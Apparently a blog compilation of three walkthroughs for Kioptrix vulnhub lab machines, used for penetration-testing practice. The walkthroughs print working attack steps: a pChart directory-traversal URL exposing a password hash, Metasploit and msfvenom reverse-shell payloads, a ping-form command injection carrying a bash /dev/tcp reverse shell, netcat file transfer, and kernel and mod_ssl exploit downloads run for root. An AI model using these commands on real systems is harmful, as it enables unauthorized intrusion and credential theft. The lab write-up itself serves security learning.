Kioptrix 5 walkthrough

root@kali:~# netdiscover -r 192.168.31.0/24

Currently scanning: Finished! | Screen View: Unique Hosts

4 Captured ARP Req/Rep packets, from 4 hosts. Total size: 240
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
—————————————————————————–
192.168.31.1 00:50:56:c0:00:08 1 60 VMware, Inc.
192.168.31.2 00:50:56:e1:a9:71 1 60 VMware, Inc.
192.168.31.146 00:50:56:20:56:e2 1 60 VMware, Inc.
192.168.31.254 00:50:56:f8:bd:9c 1 60 VMware, Inc.

Scanning:

nmap -sT -sV -A -p- 192.168.31.146 -n –open

Starting Nmap 7.50 ( https://nmap.org ) at 2018-02-26 09:05 EST
Nmap scan report for 192.168.31.146
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.2.21 ((FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8)
8080/tcp open http Apache httpd 2.2.21 ((FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8)
MAC Address: 00:50:56:20:56:E2 (VMware)
Device type: general purpose|specialized
Running (JUST GUESSING): FreeBSD 9.X|10.X|7.X|8.X|6.X (93%),
Aggressive OS guesses: FreeBSD 9.0-RELEASE – 10.3-RELEASE (93%), AVtech Room Alert 26W environmental monitor (91%), Linux 2.6.18 – 2.6.22 (90%), FreeBSD 7.0-RELEASE – 9.0-RELEASE (88%), FreeBSD 7.0-RELEASE (87%), FreeBSD 7.1-PRERELEASE 7.2-STABLE (87%), FreeBSD 7.1-RELEASE (87%), FreeBSD 8.0-STABLE (87%), FreeBSD 8.1-RELEASE (86%), FreeBSD 6.2-RELEASE (85%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop

PHP version & Apache are not useful because I am too lazy to try all or found exploits.

mod_ssl/2.2.21 related exploits also do not seem to work because there is no HTTPS on the server and the found exploits (Apache mod_ssl < 2.8.7 OpenSSL – ‘OpenFuck.c’ Remote Exploit) will not work because they need SSL.

dirb also finds nothing.

I browse to http://192.168.31.146:80 and I view source. Bingo!

<META HTTP-EQUIV=”refresh” CONTENT=”5;URL=pChart2.1.3/index.php”>

searchsploit to the rescue:

 

 

# Exploit Author: Balazs Makany
# Vendor Homepage: www.pchart.net
# Software Link: www.pchart.net/download
# Google Dork: intitle:”pChart 2.x – examples” intext:”2.1.3″
# Version: 2.1.3
# Tested on: N/A (Web Application. Tested on FreeBSD and Apache)
# CVE : N/A

[1] Directory Traversal:
“hxxp://localhost/examples/index.php?Action=View&Script=%2f..%2f..%2fetc/passwd
The traversal is executed with the web server’s privilege and leads to
sensitive file disclosure (passwd, siteconf.inc.php or similar),
access to source codes, hardcoded passwords or other high impact
consequences, depending on the web server’s configuration.
This problem may exists in the production code if the example code was
copied into the production environment.

We try different directory traversal customized URL, but they don’t work because I treat the host like a Linux system…and it is a FreeBSD one, so file locations are different.

/etc/passwd does not exist. Instead we have:

http://192.168.31.146/pChart2.1.3/examples/index.php?Action=View&Script=%2f..%2f..%2fetc/master.passwd

# $FreeBSD: release/9.0.0/etc/master.passwd 218047 2011-01-28 22:29:38Z pjd $ # root:$1$DdHlo6rh$usiPcDoTR37eL7DAyLjhk1:0:0::0:0:Charlie &:/root:/bin/csh toor:*:0:0::0:0:Bourne-again Superuser:/root:

I fail to see that the root user actually has the password encrypted and I move along, searching for the equivalent of /etc/shadow, which is /etc/spwd.db, which does not load into the browser when I access:

http://192.168.31.146/pChart2.1.3/examples/index.php?Action=View&Script=%2f..%2f..%2fetc/spwd.db%22

Google searching finds me:

http://192.168.31.146/pChart2.1.3/examples/index.php?Action=View&Script=%2f..%2f..%2fusr/local/etc/apache22/httpd.conf

<VirtualHost *:8080>
DocumentRoot /usr/local/www/apache22/data2

<Directory “/usr/local/www/apache22/data2”>
Options Indexes FollowSymLinks
AllowOverride All
Order allow,deny
Allow from env=Mozilla4_browser
</Directory>

Which means that if switch the HTTP user agent to Mozilla4, I might get a different webpage.

root@kali:~# curl -H “User-Agent:Mozilla/4.0” http://192.168.31.146:8080/phptax/ | head -n1

<title>PHPTAX by William L. Berggren 2003(c)</title> 100 4125 0 4125 0 0 2014k 0 –:–:– –:–:– –:–:– 2014k curl: (23) Failed writing body (4067 != 4230) root@kali:~#

root@kali:~# searchsploit phptax
---------------------------------------------------------- ----------------------------------
 Exploit Title | Path
 | (/usr/share/exploitdb/platforms/)
---------------------------------------------------------- ----------------------------------
PhpTax - pfilez Parameter Exec Remote Code Injection (Met | php/webapps/21833.rb
use exploit/multi/http/phptax_exec
set RHOST 192.168.31.146
set RPORT 8080

msf exploit(multi/http/phptax_exec) > run

[*] Started reverse TCP double handler on 192.168.31.139:4444
[*] 192.168.31.1468080 – Sending request…
[*] Accepted the first client connection…
[*] Accepted the second client connection…
[*] Accepted the first client connection…
[*] Accepted the second client connection…
[*] Command: echo bPVG3SBi0VbyjPza;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets…
[*] Command: echo RHWVYqnt2WyVvZsH;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets…
[*] Reading from socket B
[*] B: “bPVG3SBi0VbyjPza\r\n”
[*] Matching…
[*] A is input…
[*] Reading from socket B
[*] B: “RHWVYqnt2WyVvZsH\r\n”
[*] Matching…
[*] A is input…
[*] Command shell session 5 opened (192.168.31.139:4444 -> 192.168.31.146:47858) at 2018-02-26 17:22:01 -0500
[*] Command shell session 6 opened (192.168.31.139:4444 -> 192.168.31.146:56244) at 2018-02-26 17:22:01 -0500

id
uid=80(www) gid=80(www) groups=80(www)

We have limited shell.

uname -a reminds us that we are running FreeBSD 9.

We copy the exploit:

cp /usr/share/exploitdb/platforms/freebsd/local/28718.c ./

Upload it to the victim machine with nc:

nc -lvvp 8888 < ./28718.c   // sending from the attacking machine

nc -nv 8888 > ./28718.c  // receiving on the victim machine

chmod 777 ./28718.c

We compile and run the exploit:

Congratz to myself. I still feel like a noob.

 

Kioptrix: Level 1.1 (#2) walkthrough

This is a walkthrough of the Kioptrix: Level 1.1 (#2) vulnhub machine. Original link here: https://www.vulnhub.com/entry/kioptrix-level-11-2,23/

The scan:

root@kali:~# nmap -sT -A -O -p- 192.168.31.143

Starting Nmap 7.50 ( https://nmap.org ) at 2018-02-24 07:35 EST
Nmap scan report for 192.168.31.143
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 3.9p1 (protocol 1.99)
| ssh-hostkey:
| 1024 8f:3e:8b:1e:58:63:fe:cf:27:a3:18:09:3b:52:cf:72 (RSA1)
| 1024 34:6b:45:3d:ba:ce:ca:b2:53:55:ef:1e:43:70:38:36 (DSA)
|_ 1024 68:4d:8c:bb:b6:5a:bd:79:71:b8:71:47:ea:00:42:61 (RSA)
|_sshv1: Server supports SSHv1
80/tcp open http Apache httpd 2.0.52 ((CentOS))
|_http-server-header: Apache/2.0.52 (CentOS)
|_http-title: Site doesn’t have a title (text/html; charset=UTF-8).
111/tcp open rpcbind 2 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2 111/tcp rpcbind
| 100000 2 111/udp rpcbind
| 100024 1 625/udp status
|_ 100024 1 628/tcp status
443/tcp open ssl/http Apache httpd 2.0.52 ((CentOS))
|_http-server-header: Apache/2.0.52 (CentOS)
|_http-title: Site doesn’t have a title (text/html; charset=UTF-8).
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=–
| Not valid before: 2009-10-08T00:10:47
|_Not valid after: 2010-10-08T00:10:47
|_ssl-date: 2018-02-24T10:26:27+00:00; -2h09m39s from scanner time.
| sslv2:
| SSLv2 supported
| ciphers:
| SSL2_RC4_128_WITH_MD5
| SSL2_RC4_64_WITH_MD5
| SSL2_RC4_128_EXPORT40_WITH_MD5
| SSL2_DES_192_EDE3_CBC_WITH_MD5
| SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
| SSL2_DES_64_CBC_WITH_MD5
|_ SSL2_RC2_128_CBC_WITH_MD5
628/tcp open status 1 (RPC #100024)
631/tcp open ipp CUPS 1.1
| http-methods:
|_ Potentially risky methods: PUT
|_http-server-header: CUPS/1.1
|_http-title: 403 Forbidden
3306/tcp open mysql MySQL (unauthorized)
MAC Address: 00:0C:29:47:D4:2E (VMware)
Device type: general purpose|media device
Running: Linux 2.6.X, Star Track embedded
OS CPE: cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel:2.6.23 cpe:/h:star_track:srt2014hd
OS details: Linux 2.6.9 – 2.6.30, Star Track SRT2014HD satellite receiver (Linux 2.6.23)
Network Distance: 1 hop
root@kali:~#

First I tried exploiting port 631, which is the Linux printing service, CUPS, version 1.1

Searching for the exploit:

root@kali:~/junk/kioptrix1.2# searchsploit cups 1.1
——————————————— ———————————-
Exploit Title | Path
| (/usr/share/exploitdb/platforms/)
——————————————— ———————————-
CUPS 1.1.x – ‘.HPGL’ File Processor Buffer O | linux/remote/24977.txt
CUPS 1.1.x – Cupsd Request Method Denial of | linux/dos/22619.txt
CUPS 1.1.x – Negative Length HTTP Header | linux/remote/22106.txt
CUPS 1.1.x – UDP Packet Remote Denial of Ser | linux/dos/24599.txt
CUPS Server 1.1 – GET Request Denial of Serv | linux/dos/1196.c
——————————————— ———————————-
root@kali:~/junk/kioptrix1.2#

Generating the shell:

The exploit needs an .so payload, so I try it.

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.31.139 LPORT=8443 -f elf-so >> shell.so
No platform was selected, choosing Msf::Module::Platform::Linux from the payload
No Arch selected, selecting Arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 123 bytes
Final size of elf-so file: 369 bytes

For some reason, the exploit fails. Moving along.

Port 80 is open. we have an authentication form. Trying to bypass the authentication via SQL injection and it works:

Authentication is bypassed.

We are presented with a ping form, that should allow us to ping a network node.

We try command execution on it, while we setup a netcat listener on port 777 of our attacking machine.

127.0.0.1;bash -i >& /dev/tcp/192.168.31.139/777 0>&1

It works:

To privesc this we try the unix-privesc-script but no success.

Eventually I got it with a kernel exploit.

curl -k https://www.exploit-db.com/download/9542.c -o 9542.c

Compile it:

bash-3.00$ gcc -o 0x82-CVE-2009-2698 ./9542.c
./9542.c:109:28: warning: no newline at end of file

Run it:

Kioptrix level1.1 walkthrough

This is the Kioptrix vulnerable machine walkthrough.

You can download it from https://www.vulnhub.com/entry/kioptrix-level-1-1,22/

The scan:

root@kali:~# nmap -sT -sV -p- 192.168.31.142

Starting Nmap 7.50 ( https://nmap.org ) at 2018-02-17 17:00 EST
Nmap scan report for 192.168.31.142
Host is up (0.00014s latency).
Not shown: 65529 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 2.9p2 (protocol 1.99)
80/tcp open http Apache httpd 1.3.20 ((Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
111/tcp open rpcbind 2 (RPC #100000)
139/tcp open netbios-ssn Samba smbd (workgroup: MYGROUP)
443/tcp open ssl/https Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
1024/tcp open status 1 (RPC #100024)
MAC Address: 00:0C:29:E2:87:5A (VMware)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 18.92 seconds
root@kali:~#

We will search for vulnerabilities for mod_ssl/2.8.4.

 

root@kali:~/junk# searchsploit 764.c
————————————————————————————————————————————————————————– ———————————-
Exploit Title | Path
| (/usr/share/exploitdb/platforms/)
————————————————————————————————————————————————————————– ———————————-
Apache mod_ssl < 2.8.7 OpenSSL – ‘OpenFuckV2.c’ Remote Exploit | unix/remote/764.c
Microsoft Windows – VHDMP ZwDeleteFile Arbitrary File Deletion Privilege Escalation (MS16-138) | windows/local/40764.cs
Symantec AntiVirus – IOCTL Kernel Privilege Escalation (2) | windows/local/28764.c
TechSmith Snagit 10 (Build 788) – ‘dwmapi.dll’ DLL Hijacking | windows/local/14764.c
————————————————————————————————————————————————————————– ———————————-
root@kali:~/junk#

We will try the first result.

Downloading the exploit in C format:

http://wget https://www.exploit-db.com/download/764.c

Install prerequisites

apt-get install libssl-dev libssl1.0-dev

Edit the C file.

nano 764.c

Include the following 2 lines on the SSL include area

#include <openssl/rc4.h>
#include <openssl/md5.h>

Search for wget (ctrl+W in nano) and replace the URL with this new one :

http://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c

Compile the exploit:

sudo gcc -o OpenFucka ./764.c -lcrypto

Run the exploit:

root@kali:~/junk# ./OpenFucka 0x6b 192.168.31.142 443 -c 50

If everything works ok you should get your root shell: